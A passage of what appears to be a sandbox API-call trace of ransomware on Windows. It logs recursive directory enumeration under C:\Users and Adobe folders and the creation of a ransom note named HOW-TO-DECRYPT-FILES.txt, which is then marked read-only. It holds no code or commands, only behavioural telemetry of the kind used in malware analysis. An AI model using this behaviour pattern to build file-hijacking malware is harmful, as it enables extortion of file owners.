lpFindFileData=0x364560) returned 1 [0047.964] GetLastError () returned 0x5 [0047.964] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0047.964] GetLastError () returned 0x5 [0047.964] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0047.964] GetLastError () returned 0x5 [0047.964] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0047.964] GetLastError () returned 0x5 [0047.964] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0047.964] GetLastError () returned 0x5 [0047.964] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0047.964] GetLastError () returned 0x12 [0047.964] FindClose (in: hFindFile=0x360ee0 | out: hFindFile=0x360ee0) returned 1 [0047.964] SetErrorMode (uMode=0x0) returned 0x1 [0047.964] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0x18e9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8 [0047.964] GetLastError () returned 0x12 [0047.965] SetErrorMode (uMode=0x1) returned 0x0 [0047.965] FindFirstFileW (in: lpFileName="C:\\Users\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360ee0 [0047.965] GetLastError () returned 0x12 [0047.965] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0047.965] GetLastError () returned 0x12 [0047.965] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0047.965] GetLastError () returned 0x12 [0047.965] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0047.965] GetLastError () returned 0x12 [0047.965] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0047.965] GetLastError () returned 0x12 [0047.965] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0047.965] GetLastError () returned 0x12 [0047.965] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0047.966] GetLastError () returned 0x12 [0047.966] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0047.966] GetLastError () returned 0x12 [0047.966] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0047.966] GetLastError () returned 0x12 [0047.966] FindClose (in: hFindFile=0x360ee0 | out: hFindFile=0x360ee0) returned 1 [0047.966] SetErrorMode (uMode=0x0) returned 0x1 [0047.966] GetFullPathNameW (in: lpFileName="C:\\Users\\desktop.ini", nBufferLength=0x105, lpBuffer=0x18ea64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\desktop.ini", lpFilePart=0x0) returned 0x14 [0047.966] GetLastError () returned 0x12 [0047.966] SetErrorMode (uMode=0x1) returned 0x0 [0047.966] GetFileAttributesExW (in: lpFileName="C:\\Users\\desktop.ini" (normalized: "c:\\users\\desktop.ini"), fInfoLevelId=0x0, lpFileInformation=0x1b91294 | out: lpFileInformation=0x1b91294*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6b61335c, ftCreationTime.dwHighDateTime=0x1ca043d, ftLastAccessTime.dwLowDateTime=0x6b61335c, ftLastAccessTime.dwHighDateTime=0x1ca043d, ftLastWriteTime.dwLowDateTime=0x6b61335c, ftLastWriteTime.dwHighDateTime=0x1ca043d, nFileSizeHigh=0x0, nFileSizeLow=0xae)) returned 1 [0047.966] GetLastError () returned 0x12 [0047.966] SetErrorMode (uMode=0x0) returned 0x1 [0047.967] GetFullPathNameW (in: lpFileName="C:\\Users\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e910, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x21 [0047.967] GetLastError () returned 0x12 [0047.967] SetErrorMode (uMode=0x1) returned 0x0 [0047.967] CreateFileW (lpFileName="C:\\Users\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0047.968] GetLastError () returned 0x0 [0047.968] GetFileType (hFile=0x184) returned 0x1 [0047.968] SetErrorMode (uMode=0x0) returned 0x1 [0047.968] GetFileType (hFile=0x184) returned 0x1 [0047.968] WriteFile (in: hFile=0x184, lpBuffer=0x1bad07c*, nNumberOfBytesToWrite=0x18da, lpNumberOfBytesWritten=0x18ee70, lpOverlapped=0x0 | out: lpBuffer=0x1bad07c*, lpNumberOfBytesWritten=0x18ee70*=0x18da, lpOverlapped=0x0) returned 1 [0047.969] GetLastError () returned 0x0 [0047.969] CloseHandle (hObject=0x184) returned 1 [0047.969] GetLastError () returned 0x0 [0047.969] GetFullPathNameW (in: lpFileName="C:\\Users\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18ea38, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x21 [0047.969] GetLastError () returned 0x0 [0047.969] SetFileAttributesW (lpFileName="C:\\Users\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0047.973] GetLastError () returned 0x0 [0047.973] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users", nBufferLength=0x105, lpBuffer=0x18ea6c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users", lpFilePart=0x0) returned 0x12 [0047.973] GetLastError () returned 0x0 [0047.973] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0047.973] GetLastError () returned 0x0 [0047.973] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0047.973] GetLastError () returned 0x0 [0047.973] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users", nBufferLength=0x105, lpBuffer=0x18e944, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users", lpFilePart=0x0) returned 0x12 [0047.973] GetLastError () returned 0x0 [0047.973] SetErrorMode (uMode=0x1) returned 0x0 [0047.973] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360ee0 [0047.974] GetLastError () returned 0x0 [0047.974] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0047.974] GetLastError () returned 0x0 [0047.974] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0047.974] GetLastError () returned 0x0 [0047.974] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0047.974] GetLastError () returned 0x0 [0047.974] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0047.974] GetLastError () returned 0x0 [0047.974] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0047.974] GetLastError () returned 0x0 [0047.974] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0047.974] GetLastError () returned 0x0 [0047.974] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0047.974] GetLastError () returned 0x0 [0047.975] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0047.975] GetLastError () returned 0x0 [0047.975] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0047.975] GetLastError () returned 0x0 [0047.975] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0047.975] GetLastError () returned 0x0 [0047.975] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0047.975] GetLastError () returned 0x0 [0047.975] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0047.975] GetLastError () returned 0x0 [0047.975] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0047.975] GetLastError () returned 0x0 [0047.975] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0047.975] GetLastError () returned 0x0 [0047.976] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0047.976] GetLastError () returned 0x12 [0047.976] FindClose (in: hFindFile=0x360ee0 | out: hFindFile=0x360ee0) returned 1 [0047.976] SetErrorMode (uMode=0x0) returned 0x1 [0047.976] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users", nBufferLength=0x105, lpBuffer=0x18e944, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users", lpFilePart=0x0) returned 0x12 [0047.976] GetLastError () returned 0x12 [0047.976] SetErrorMode (uMode=0x1) returned 0x0 [0047.976] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360ee0 [0047.976] GetLastError () returned 0x12 [0047.976] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0047.976] GetLastError () returned 0x12 [0047.976] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0047.976] GetLastError () returned 0x12 [0047.976] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0047.976] GetLastError () returned 0x12 [0047.976] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0047.976] GetLastError () returned 0x12 [0047.976] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0047.976] GetLastError () returned 0x12 [0047.976] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0047.976] GetLastError () returned 0x12 [0047.976] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0047.976] GetLastError () returned 0x12 [0047.976] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0047.976] GetLastError () returned 0x12 [0047.976] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0047.976] GetLastError () returned 0x12 [0047.976] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0047.976] GetLastError () returned 0x12 [0047.976] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0047.977] GetLastError () returned 0x12 [0047.977] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0047.977] GetLastError () returned 0x12 [0047.977] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0047.977] GetLastError () returned 0x12 [0047.977] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0047.977] GetLastError () returned 0x12 [0047.977] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0047.977] GetLastError () returned 0x12 [0047.977] FindClose (in: hFindFile=0x360ee0 | out: hFindFile=0x360ee0) returned 1 [0047.977] SetErrorMode (uMode=0x0) returned 0x1 [0047.977] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Adobe", nBufferLength=0x105, lpBuffer=0x18ea00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Adobe", lpFilePart=0x0) returned 0x18 [0047.977] GetLastError () returned 0x12 [0047.977] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0047.977] GetLastError () returned 0x12 [0047.977] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e924, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0047.977] GetLastError () returned 0x12 [0047.977] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Adobe", nBufferLength=0x105, lpBuffer=0x18e8d8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Adobe", lpFilePart=0x0) returned 0x18 [0047.977] GetLastError () returned 0x12 [0047.977] SetErrorMode (uMode=0x1) returned 0x0 [0047.977] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Adobe\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360ee0 [0047.977] GetLastError () returned 0x12 [0047.978] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0047.978] GetLastError () returned 0x12 [0047.978] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0047.978] GetLastError () returned 0x12 [0047.978] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0047.978] GetLastError () returned 0x12 [0047.978] FindClose (in: hFindFile=0x360ee0 | out: hFindFile=0x360ee0) returned 1 [0047.978] SetErrorMode (uMode=0x0) returned 0x1 [0047.978] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Adobe", nBufferLength=0x105, lpBuffer=0x18e8d8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Adobe", lpFilePart=0x0) returned 0x18 [0047.978] GetLastError () returned 0x12 [0047.978] SetErrorMode (uMode=0x1) returned 0x0 [0047.978] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Adobe\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360ee0 [0047.978] GetLastError () returned 0x12 [0047.978] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0047.978] GetLastError () returned 0x12 [0047.978] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0047.978] GetLastError () returned 0x12 [0047.978] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0047.978] GetLastError () returned 0x12 [0047.978] FindClose (in: hFindFile=0x360ee0 | out: hFindFile=0x360ee0) returned 1 [0047.978] SetErrorMode (uMode=0x0) returned 0x1 [0047.978] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Adobe\\Acrobat", nBufferLength=0x105, lpBuffer=0x18e994, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Adobe\\Acrobat", lpFilePart=0x0) returned 0x20 [0047.978] GetLastError () returned 0x12 [0047.978] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0047.978] GetLastError () returned 0x12 [0047.978] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e8b8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0047.978] GetLastError () returned 0x12 [0047.978] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Adobe\\Acrobat", nBufferLength=0x105, lpBuffer=0x18e86c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Adobe\\Acrobat", lpFilePart=0x0) returned 0x20 [0047.978] GetLastError () returned 0x12 [0047.978] SetErrorMode (uMode=0x1) returned 0x0 [0047.978] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Adobe\\Acrobat\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360ee0 [0047.979] GetLastError () returned 0x12 [0047.979] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0047.979] GetLastError () returned 0x12 [0047.979] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0047.979] GetLastError () returned 0x12 [0047.979] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0047.979] GetLastError () returned 0x12 [0047.979] FindClose (in: hFindFile=0x360ee0 | out: hFindFile=0x360ee0) returned 1 [0047.979] SetErrorMode (uMode=0x0) returned 0x1 [0047.979] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Adobe\\Acrobat", nBufferLength=0x105, lpBuffer=0x18e86c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Adobe\\Acrobat", lpFilePart=0x0) returned 0x20 [0047.979] GetLastError () returned 0x12 [0047.979] SetErrorMode (uMode=0x1) returned 0x0 [0047.979] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Adobe\\Acrobat\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360ee0 [0047.979] GetLastError () returned 0x12 [0047.979] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0047.979] GetLastError () returned 0x12 [0047.979] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0047.979] GetLastError () returned 0x12 [0047.979] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0047.979] GetLastError () returned 0x12 [0047.979] FindClose (in: hFindFile=0x360ee0 | out: hFindFile=0x360ee0) returned 1 [0047.979] SetErrorMode (uMode=0x0) returned 0x1 [0047.979] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Adobe\\Acrobat\\10.0", nBufferLength=0x105, lpBuffer=0x18e928, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Adobe\\Acrobat\\10.0", lpFilePart=0x0) returned 0x25 [0047.979] GetLastError () returned 0x12 [0047.979] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0047.979] GetLastError () returned 0x12 [0047.979] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e84c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0047.979] GetLastError () returned 0x12 [0047.979] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Adobe\\Acrobat\\10.0", nBufferLength=0x105, lpBuffer=0x18e800, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Adobe\\Acrobat\\10.0", lpFilePart=0x0) returned 0x25 [0047.979] GetLastError () returned 0x12 [0047.979] SetErrorMode (uMode=0x1) returned 0x0 [0047.980] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360ee0 [0047.980] GetLastError () returned 0x12 [0047.980] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0047.980] GetLastError () returned 0x12 [0047.980] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0047.980] GetLastError () returned 0x12 [0047.980] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0047.980] GetLastError () returned 0x12 [0047.980] FindClose (in: hFindFile=0x360ee0 | out: hFindFile=0x360ee0) returned 1 [0047.980] SetErrorMode (uMode=0x0) returned 0x1 [0047.980] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Adobe\\Acrobat\\10.0", nBufferLength=0x105, lpBuffer=0x18e800, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Adobe\\Acrobat\\10.0", lpFilePart=0x0) returned 0x25 [0047.980] GetLastError () returned 0x12 [0047.980] SetErrorMode (uMode=0x1) returned 0x0 [0047.980] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360ee0 [0047.980] GetLastError () returned 0x12 [0047.980] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0047.980] GetLastError () returned 0x12 [0047.980] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0047.980] GetLastError () returned 0x12 [0047.980] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0047.980] GetLastError () returned 0x12 [0047.980] FindClose (in: hFindFile=0x360ee0 | out: hFindFile=0x360ee0) returned 1 [0047.980] SetErrorMode (uMode=0x0) returned 0x1 [0047.980] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate", nBufferLength=0x105, lpBuffer=0x18e8bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate", lpFilePart=0x0) returned 0x2f [0047.980] GetLastError () returned 0x12 [0047.980] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0047.980] GetLastError () returned 0x12 [0047.981] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0047.981] GetLastError () returned 0x12 [0047.981] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate", nBufferLength=0x105, lpBuffer=0x18e794, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate", lpFilePart=0x0) returned 0x2f [0047.981] GetLastError () returned 0x12 [0047.981] SetErrorMode (uMode=0x1) returned 0x0 [0047.981] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360ee0 [0047.981] GetLastError () returned 0x12 [0047.981] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0047.981] GetLastError () returned 0x12 [0047.981] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0047.981] GetLastError () returned 0x12 [0047.981] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0047.981] GetLastError () returned 0x12 [0047.981] FindClose (in: hFindFile=0x360ee0 | out: hFindFile=0x360ee0) returned 1 [0047.981] SetErrorMode (uMode=0x0) returned 0x1 [0047.981] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate", nBufferLength=0x105, lpBuffer=0x18e794, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate", lpFilePart=0x0) returned 0x2f [0047.981] GetLastError () returned 0x12 [0047.981] SetErrorMode (uMode=0x1) returned 0x0 [0047.981] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360ee0 [0047.981] GetLastError () returned 0x12 [0047.981] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0047.981] GetLastError () returned 0x12 [0047.981] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0047.981] GetLastError () returned 0x12 [0047.981] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0047.981] GetLastError () returned 0x12 [0047.981] FindClose (in: hFindFile=0x360ee0 | out: hFindFile=0x360ee0) returned 1 [0047.982] SetErrorMode (uMode=0x0) returned 0x1 [0047.982] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\Security", nBufferLength=0x105, lpBuffer=0x18e850, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\Security", lpFilePart=0x0) returned 0x38 [0047.982] GetLastError () returned 0x12 [0047.982] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0047.982] GetLastError () returned 0x12 [0047.982] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e774, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0047.982] GetLastError () returned 0x12 [0047.982] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\Security", nBufferLength=0x105, lpBuffer=0x18e728, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\Security", lpFilePart=0x0) returned 0x38 [0047.982] GetLastError () returned 0x12 [0047.982] SetErrorMode (uMode=0x1) returned 0x0 [0047.982] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360ee0 [0047.982] GetLastError () returned 0x12 [0047.982] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0047.982] GetLastError () returned 0x12 [0047.982] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0047.982] GetLastError () returned 0x12 [0047.982] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0047.982] GetLastError () returned 0x12 [0047.982] FindClose (in: hFindFile=0x360ee0 | out: hFindFile=0x360ee0) returned 1 [0047.982] SetErrorMode (uMode=0x0) returned 0x1 [0047.983] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\Security", nBufferLength=0x105, lpBuffer=0x18e728, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\Security", lpFilePart=0x0) returned 0x38 [0047.983] GetLastError () returned 0x12 [0047.983] SetErrorMode (uMode=0x1) returned 0x0 [0047.983] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360ee0 [0047.983] GetLastError () returned 0x12 [0047.983] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0047.983] GetLastError () returned 0x12 [0047.983] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0047.983] GetLastError () returned 0x12 [0047.983] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0047.983] GetLastError () returned 0x12 [0047.983] FindClose (in: hFindFile=0x360ee0 | out: hFindFile=0x360ee0) returned 1 [0047.983] SetErrorMode (uMode=0x0) returned 0x1 [0047.983] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\directories.acrodata", nBufferLength=0x105, lpBuffer=0x18e7dc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\directories.acrodata", lpFilePart=0x0) returned 0x4d [0047.983] GetLastError () returned 0x12 [0047.983] SetErrorMode (uMode=0x1) returned 0x0 [0047.983] GetFileAttributesExW (in: lpFileName="C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\directories.acrodata" (normalized: "c:\\users\\all 